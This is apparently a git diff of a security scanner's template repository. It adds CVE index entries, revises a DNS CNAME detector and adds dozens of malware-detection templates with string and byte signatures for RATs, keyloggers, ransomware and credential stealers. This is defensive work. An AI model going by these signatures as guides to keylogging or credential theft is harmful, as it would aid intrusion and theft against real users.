been patched in version 3.16.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22480.yaml"} {"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} {"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"} @@ -1962,3 +1970,5 @@ {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"high","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} +{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"} +{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f35cde2940..6e8a608205 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b58b2350b7c7c0ab742dbd60851e3b31 +a11349fed98e93a8bbebdc46ec6718ae diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index 22148b690e..f11d6cf5a1 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -10,21 +10,17 @@ info: - https://www.theregister.com/2021/02/24/dns_cname_tracking/ - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/ metadata: - max-request: 2 + max-request: 1 tags: dns,service dns: - name: "{{FQDN}}" type: CNAME - - name: "{{FQDN}}" - type: A - extractors: - - type: regex - group: 1 - regex: - - 'IN\t(?:A|CNAME)\t([A-Za-z0-9-_.]*([a-zA-Z]+[0-9]+|[0-9.]+[a-zA-Z]+))' + - type: dsl + dsl: + - cname matchers-condition: or matchers: @@ -389,6 +385,7 @@ dns: words: - hs.eloqua.com - - type: word - words: + - type: regex + regex: - "IN\tCNAME" + - "IN\\s*CNAME" diff --git a/file/malware/aar-malware.yaml b/file/malware/aar-malware.yaml new file mode 100644 index 0000000000..826b2d9e3c --- /dev/null +++ b/file/malware/aar-malware.yaml @@ -0,0 +1,25 @@ +id: aar-malware + +info: + name: AAR Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "Hashtable" + - "get_IsDisposed" + - "TripleDES" + - "testmemory.FRMMain.resources" + - "$this.Icon" + - "{11111-22222-20001-00001}" + - "@@@@@" + condition: and \ No newline at end of file diff --git a/file/malware/adzok-malware.yaml b/file/malware/adzok-malware.yaml new file mode 100644 index 0000000000..77504dd278 --- /dev/null +++ b/file/malware/adzok-malware.yaml @@ -0,0 +1,110 @@ +id: adzok-malware + +info: + name: Adzok Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Adzok.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "resources/icono.pngPK" + condition: and \ No newline at end of file diff --git a/file/malware/alfa-malware.yaml b/file/malware/alfa-malware.yaml new file mode 100644 index 0000000000..3f794408ea --- /dev/null +++ b/file/malware/alfa-malware.yaml @@ -0,0 +1,19 @@ +id: alfa-malware + +info: + name: Alfa Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "8B0C9781E1FFFF000081F919040000740F81F9" + - "220400007407423BD07CE2EB02" + condition: and diff --git a/file/malware/alienspy-malware.yaml b/file/malware/alienspy-malware.yaml new file mode 100644 index 0000000000..bd5ead14b3 --- /dev/null +++ b/file/malware/alienspy-malware.yaml @@ -0,0 +1,25 @@ +id: alienspy-malware + +info: + name: AlienSpy Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "META-INF/MANIFEST.MF" + - "ePK" + - "kPK" + - "config.ini" + - "password.ini" + - "stub/stub.dll" + - "c.dat" + condition: and \ No newline at end of file diff --git a/file/malware/alina-malware.yaml b/file/malware/alina-malware.yaml new file mode 100644 index 0000000000..9b4f6141e0 --- /dev/null +++ b/file/malware/alina-malware.yaml @@ -0,0 +1,21 @@ +id: alina-malware + +info: + name: Alina Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'Alina v1.0' + - 'POST' + - '1[0-2])[0-9]' + condition: and \ No newline at end of file diff --git a/file/malware/alpha-malware.yaml b/file/malware/alpha-malware.yaml new file mode 100644 index 0000000000..667414d798 --- /dev/null +++ b/file/malware/alpha-malware.yaml @@ -0,0 +1,17 @@ +id: alpha-malware + +info: + name: Alpha Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "520065006100640020004D0065002000280048006F00770020004400650063" diff --git a/file/malware/andromeda-malware.yaml b/file/malware/andromeda-malware.yaml new file mode 100644 index 0000000000..64c7732254 --- /dev/null +++ b/file/malware/andromeda-malware.yaml @@ -0,0 +1,23 @@ +id: andromeda-malware + +info: + name: Andromeda Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - 'hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst' + + - type: binary + binary: + - "1C1C1D03494746" \ No newline at end of file diff --git a/file/malware/ap0calypse-malware.yaml b/file/malware/ap0calypse-malware.yaml new file mode 100644 index 0000000000..55f1f59b8d --- /dev/null +++ b/file/malware/ap0calypse-malware.yaml @@ -0,0 +1,24 @@ +id: ap0calypse-malware + +info: + name: Ap0calypse Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "Ap0calypse" + - "Sifre" + - "MsgGoster" + - "Baslik" + - "Dosyalars" + - "Injecsiyon" + condition: and \ No newline at end of file diff --git a/file/malware/arcom-malware.yaml b/file/malware/arcom-malware.yaml new file mode 100644 index 0000000000..a26bb3d29f --- /dev/null +++ b/file/malware/arcom-malware.yaml @@ -0,0 +1,28 @@ +id: arcom-malware + +info: + name: Arcom Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "CVu3388fnek3W(3ij3fkp0930di" + - "ZINGAWI2" + - "clWebLightGoldenrodYellow" + - "Ancestor for '%s' not found" + - "Control-C hit" + condition: and + + - type: binary + binary: + - "A3242521" \ No newline at end of file diff --git a/file/malware/arkei-malware.yaml b/file/malware/arkei-malware.yaml new file mode 100644 index 0000000000..aedc5ee182 --- /dev/null +++ b/file/malware/arkei-malware.yaml @@ -0,0 +1,23 @@ +id: arkei-malware + +info: + name: Arkei Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'Arkei' + - '/server/gate' + - '/server/grubConfig' + - '\\files\\' + - 'SQLite' + condition: and \ No newline at end of file diff --git a/file/malware/backoff-malware.yaml b/file/malware/backoff-malware.yaml new file mode 100644 index 0000000000..3219fcd564 --- /dev/null +++ b/file/malware/backoff-malware.yaml @@ -0,0 +1,21 @@ +id: backoff-malware + +info: + name: Backoff Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Backoff.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - '&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s' + - '%s @ %s' + - 'Upload KeyLogs' + condition: and \ No newline at end of file diff --git a/file/malware/bandook-malware.yaml b/file/malware/bandook-malware.yaml new file mode 100644 index 0000000000..a7ac27a5c3 --- /dev/null +++ b/file/malware/bandook-malware.yaml @@ -0,0 +1,28 @@ +id: bandook-malware + +info: + name: Bandook Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "aaaaaa1|" + - "aaaaaa2|" + - "aaaaaa3|" + - "aaaaaa4|" + - "aaaaaa5|" + - "%s%d.exe" + - "astalavista" + - "givemecache" + - "%s\\system32\\drivers\\blogs\\*" + - "bndk13me" + condition: and diff --git a/file/malware/blacknix-malware.yaml b/file/malware/blacknix-malware.yaml new file mode 100644 index 0000000000..9b76d44068 --- /dev/null +++ b/file/malware/blacknix-malware.yaml @@ -0,0 +1,23 @@ +id: blacknix-malware + +info: + name: BlackNix Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "SETTINGS" + - "Mark Adler" + - "Random-Number-Here" + - "RemoteShell" + - "SystemInfo" + condition: and diff --git a/file/malware/blackworm-malware.yaml b/file/malware/blackworm-malware.yaml new file mode 100644 index 0000000000..0e03c36477 --- /dev/null +++ b/file/malware/blackworm-malware.yaml @@ -0,0 +1,29 @@ +id: blackworm-malware + +info: + name: Blackworm Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_BlackWorm.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'm_ComputerObjectProvider' + - 'MyWebServices' + - 'get_ExecutablePath' + - 'get_WebServices' + - 'My.WebServices' + - 'My.User' + - 'm_UserObjectProvider' + - 'DelegateCallback' + - 'TargetMethod' + - '000004b0' + - 'Microsoft Corporation' + condition: and \ No newline at end of file diff --git a/file/malware/bluebanana-malware.yaml b/file/malware/bluebanana-malware.yaml new file mode 100644 index 0000000000..450c03fec5 --- /dev/null +++ b/file/malware/bluebanana-malware.yaml @@ -0,0 +1,24 @@ +id: bluebanana-malware + +info: + name: BlueBanana Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "META-INF" + - "config.txt" + - "a/a/a/a/f.class" + - "a/a/a/a/l.class" + - "a/a/a/b/q.class" + - "a/a/a/b/v.class" + condition: and diff --git a/file/malware/bozok-malware.yaml b/file/malware/bozok-malware.yaml new file mode 100644 index 0000000000..1b4d7ec3fe --- /dev/null +++ b/file/malware/bozok-malware.yaml @@ -0,0 +1,24 @@ +id: bozok-malware + +info: + name: Bozok Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Bozok.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "getVer" + - "StartVNC" + - "SendCamList" + - "untPlugin" + - "gethostbyname" + condition: and + case-insensitive: true \ No newline at end of file diff --git a/file/malware/bublik-malware.yaml b/file/malware/bublik-malware.yaml new file mode 100644 index 0000000000..31fd9982b4 --- /dev/null +++ b/file/malware/bublik-malware.yaml @@ -0,0 +1,19 @@ +id: bublik-malware + +info: + name: Bublik Malware Detector + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Bublik.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - '636F6E736F6C6173' + - '636C556E00696E666F2E696E69' + condition: and \ No newline at end of file diff --git a/file/malware/cap-hookexkeylogger-malware.yaml b/file/malware/cap-hookexkeylogger-malware.yaml new file mode 100644 index 0000000000..14535018bf --- /dev/null +++ b/file/malware/cap-hookexkeylogger-malware.yaml @@ -0,0 +1,38 @@ +id: cap-hookexkeylogger-malware + +info: + name: CAP HookExKeylogger Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_CAP_HookExKeylogger.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "SetWindowsHookEx" + - "WH_KEYBOARD_LL" + condition: and + case-insensitive: true + + - type: word + part: raw + words: + - "SetWindowsHookEx" + - "WH_KEYBOARD" + condition: and + case-insensitive: true + + - type: word + part: raw + words: + - "WH_KEYBOARD" + - "WH_KEYBOARD_LL" + condition: and + case-insensitive: true \ No newline at end of file diff --git a/file/malware/cerberus-malware.yaml b/file/malware/cerberus-malware.yaml new file mode 100644 index 0000000000..259ad785fa --- /dev/null +++ b/file/malware/cerberus-malware.yaml @@ -0,0 +1,28 @@ +id: cerberus-malware + +info: + name: Cerberus Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "Ypmw1Syv023QZD" + - "wZ2pla" + - "wBmpf3Pb7RJe" + condition: or + + - type: word + part: raw + words: + - "cerberus" + case-insensitive: true diff --git a/file/malware/clientmesh-malware.yaml b/file/malware/clientmesh-malware.yaml new file mode 100644 index 0000000000..3a8713d7be --- /dev/null +++ b/file/malware/clientmesh-malware.yaml @@ -0,0 +1,29 @@ +id: clientmesh-malware + +info: + name: ClientMesh Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "machinedetails" + - "MySettings" + - "sendftppasswords" + - "sendbrowserpasswords" + - "arma2keyMass" + - "keylogger" + condition: and + + - type: binary + binary: + - "0000000000000000007E" \ No newline at end of file diff --git a/file/malware/crimson-malware.yaml b/file/malware/crimson-malware.yaml new file mode 100644 index 0000000000..8d79c7a766 --- /dev/null +++ b/file/malware/crimson-malware.yaml @@ -0,0 +1,23 @@ +id: crimson-malware + +info: + name: Crimson Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Crimson.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "com/crimson/PK" + - "com/crimson/bootstrapJar/PK" + - "com/crimson/permaJarMulti/PermaJarReporter$1.classPK" + - "com/crimson/universal/containers/KeyloggerLog.classPK" + - "com/crimson/universal/UploadTransfer.classPK" + condition: and diff --git a/file/malware/cryptxxx-dropper-malware.yaml b/file/malware/cryptxxx-dropper-malware.yaml new file mode 100644 index 0000000000..df19738c6c --- /dev/null +++ b/file/malware/cryptxxx-dropper-malware.yaml @@ -0,0 +1,19 @@ +id: cryptxxx-dropper-malware + +info: + name: CryptXXX Dropper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "50653157584346765962486F35" + - "43003A005C0042004900450052005C0051006D006B004E0052004C00460000" + condition: and \ No newline at end of file diff --git a/file/malware/cryptxxx-malware.yaml b/file/malware/cryptxxx-malware.yaml new file mode 100644 index 0000000000..07866a3b0b --- /dev/null +++ b/file/malware/cryptxxx-malware.yaml @@ -0,0 +1,42 @@ +id: cryptxxx-malware + +info: + name: CryptXXX Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "525947404A41595D52000000FFFFFFFF" + - "0600000052594740405A0000FFFFFFFF" + - "0A000000525C4B4D574D424B5C520000" + - "FFFFFFFF0A000000525D575D5A4B4370" + - "3F520000FFFFFFFF06000000524C4141" + - "5A520000FFFFFFFF0A000000525C4B4D" + - "41584B5C57520000FFFFFFFF0E000000" + - "522A5C4B4D574D424B204C4740520000" + - "FFFFFFFF0A000000525E4B5C48424149" + - "5D520000FFFFFFFF05000000524B4847" + - "52000000FFFFFFFF0C000000524D4140" + - "48474920435D475200000000FFFFFFFF" + - "0A000000525E5C41495C4F703F520000" + - "FFFFFFFF0A000000525E5C41495C4F70" + - "3C520000FFFFFFFF0800000052494141" + - "49424B5200000000FFFFFFFF06000000" + - "525A4B435E520000FFFFFFFF08000000" + - "52483A4C4D703F5200000000FFFFFFFF" + - "0A000000524F42425B5D4B703F520000" + - "FFFFFFFF0A000000525E5C41495C4F70" + - "3F520000FFFFFFFF0A000000525E5C41" + - "495C4F703C520000FFFFFFFF09000000" + - "524F5E5E4A4F5A4F52000000FFFFFFFF" + - "0A000000525E5C41495C4F703D520000" + - "FFFFFFFF08000000525E5B4C42474D52" + condition: and \ No newline at end of file diff --git a/file/malware/cxpid-malware.yaml b/file/malware/cxpid-malware.yaml new file mode 100644 index 0000000000..6019bd1e37 --- /dev/null +++ b/file/malware/cxpid-malware.yaml @@ -0,0 +1,27 @@ +id: cxpid-malware + +info: + name: Cxpid Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cxpid.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - '/cxpid/submit.php?SessionID=' + - '/cxgid/' + - 'E21BC52BEA2FEF26D005CF' + - 'E21BC52BEA39E435C40CD8' + - ' -,L-,O+,Q-,R-,Y-,S-' + + - type: binary + binary: + - "558BECB9380400006A006A004975F9" \ No newline at end of file diff --git a/file/malware/cythosia-malware.yaml b/file/malware/cythosia-malware.yaml new file mode 100644 index 0000000000..081a55ed58 --- /dev/null +++ b/file/malware/cythosia-malware.yaml @@ -0,0 +1,18 @@ +id: cythosia-malware + +info: + name: Cythosia Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cythosia.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'HarvesterSocksBot.Properties.Resources' \ No newline at end of file diff --git a/file/malware/darkrat-malware.yaml b/file/malware/darkrat-malware.yaml new file mode 100644 index 0000000000..69503ad5c0 --- /dev/null +++ b/file/malware/darkrat-malware.yaml @@ -0,0 +1,25 @@ +id: darkrat-malware + +info: + name: DarkRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "@1906dark1996coder@" + - "SHEmptyRecycleBinA" + - "mciSendStringA" + - "add_Shutdown" + - "get_SaveMySettingsOnExit" + - "get_SpecialDirectories" + - "Client.My" + condition: and diff --git a/file/malware/ddostf-malware.yaml b/file/malware/ddostf-malware.yaml new file mode 100644 index 0000000000..90db92b876 --- /dev/null +++ b/file/malware/ddostf-malware.yaml @@ -0,0 +1,30 @@ +id: ddostf-malware + +info: + name: DDoSTf Malware - Detect + author: daffainfo + severity: info + reference: + - http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DDoSTf.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - 'ddos.tf' + - 'Accept-Language: zh' + - '%d Kb/bps|%d%%' + condition: and + + - type: binary + binary: + - 'E8AEBEE7BDAE5443505F4B454550494E54564CE99499E8AFAFEFBC9A00' + - 'E8AEBEE7BDAE5443505F4B454550434E54E99499E8AFAFEFBC9A00' + condition: and \ No newline at end of file diff --git a/file/malware/derkziel-malware.yaml b/file/malware/derkziel-malware.yaml new file mode 100644 index 0000000000..7c2aa65ec2 --- /dev/null +++ b/file/malware/derkziel-malware.yaml @@ -0,0 +1,25 @@ +id: derkziel-malware + +info: + name: Derkziel Malware - Detect + author: daffainfo + severity: info + reference: + - https://bhf.su/threads/137898/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Derkziel.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - '{!}DRZ{!}' + - 'User-Agent: Uploador' + - 'SteamAppData.vdf' + - 'loginusers.vdf' + - 'config.vdf' + condition: and \ No newline at end of file diff --git a/file/malware/dexter-malware.yaml b/file/malware/dexter-malware.yaml new file mode 100644 index 0000000000..a0a340ab11 --- /dev/null +++ b/file/malware/dexter-malware.yaml @@ -0,0 +1,24 @@ +id: dexter-malware + +info: + name: Dexter Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Dexter.yar + - http://goo.gl/oBvy8b + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'Java Security Plugin' + - '%s\\%s\\%s.exe' + - 'Sun Java Security Plugin' + - '\\Internet Explorer\\iexplore.exe' + condition: and \ No newline at end of file diff --git a/file/malware/diamondfox-malware.yaml b/file/malware/diamondfox-malware.yaml new file mode 100644 index 0000000000..da9087a090 --- /dev/null +++ b/file/malware/diamondfox-malware.yaml @@ -0,0 +1,24 @@ +id: diamondfox-malware + +info: + name: DiamondFox Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DiamondFox.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'UPDATE_B' + - 'UNISTALL_B' + - 'S_PROTECT' + - 'P_WALLET' + - 'GR_COMMAND' + - 'FTPUPLOAD' + condition: and \ No newline at end of file diff --git a/file/malware/dmalocker-malware.yaml b/file/malware/dmalocker-malware.yaml new file mode 100644 index 0000000000..da1c8fc556 --- /dev/null +++ b/file/malware/dmalocker-malware.yaml @@ -0,0 +1,22 @@ +id: dmalocker-malware + +info: + name: DMA Locker Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DMALocker.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "41424358595a3131" + - "21444d414c4f434b" + - "21444d414c4f434b332e30" + - "3F520000FFFFFFFF06000000524C4141" + - "21444d414c4f434b342e30" + condition: or diff --git a/file/malware/doublepulsar-malware.yaml b/file/malware/doublepulsar-malware.yaml new file mode 100644 index 0000000000..f75042ae22 --- /dev/null +++ b/file/malware/doublepulsar-malware.yaml @@ -0,0 +1,19 @@ +id: doublepulsar-malware + +info: + name: DoublePulsar Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DoublePulsar_Petya.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "FD0C8C5CB8C424C5CCCCCC0EE8CC246BCCCCCC0F24CDCCCCCC275C9775BACDCCCCC3FE" + - "45208D938D928D918D90929391970F9F9E9D99844529844D20CCCDCCCC9B844503844514844549CC3333332477CCCCCC844549C43333332484CDCCCC844549DC333333844749CC333333844741" + condition: or \ No newline at end of file diff --git a/file/malware/eicar-malware.yaml b/file/malware/eicar-malware.yaml new file mode 100644 index 0000000000..efdae29c31 --- /dev/null +++ b/file/malware/eicar-malware.yaml @@ -0,0 +1,18 @@ +id: eicar-malware + +info: + name: Eicar Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Eicar.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" \ No newline at end of file diff --git a/file/malware/erebus-malware.yaml b/file/malware/erebus-malware.yaml new file mode 100644 index 0000000000..bf34157061 --- /dev/null +++ b/file/malware/erebus-malware.yaml @@ -0,0 +1,20 @@ +id: erebus-malware + +info: + name: Erebus Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Erebus.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log" + - "EREBUS IS BEST." + condition: and \ No newline at end of file diff --git a/file/malware/ezcob-malware.yaml b/file/malware/ezcob-malware.yaml new file mode 100644 index 0000000000..8aa21c0505 --- /dev/null +++ b/file/malware/ezcob-malware.yaml @@ -0,0 +1,23 @@ +id: ezcob-malware + +info: + name: Ezcob Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Ezcob.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - '\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12' + - '\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12' + - 'Ezcob' + - 'l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126' + - '20110113144935' + condition: or \ No newline at end of file diff --git a/file/malware/fudcrypt-malware.yaml b/file/malware/fudcrypt-malware.yaml new file mode 100644 index 0000000000..1a257fd1ce --- /dev/null +++ b/file/malware/fudcrypt-malware.yaml @@ -0,0 +1,31 @@ +id: fudcrypt-malware + +info: 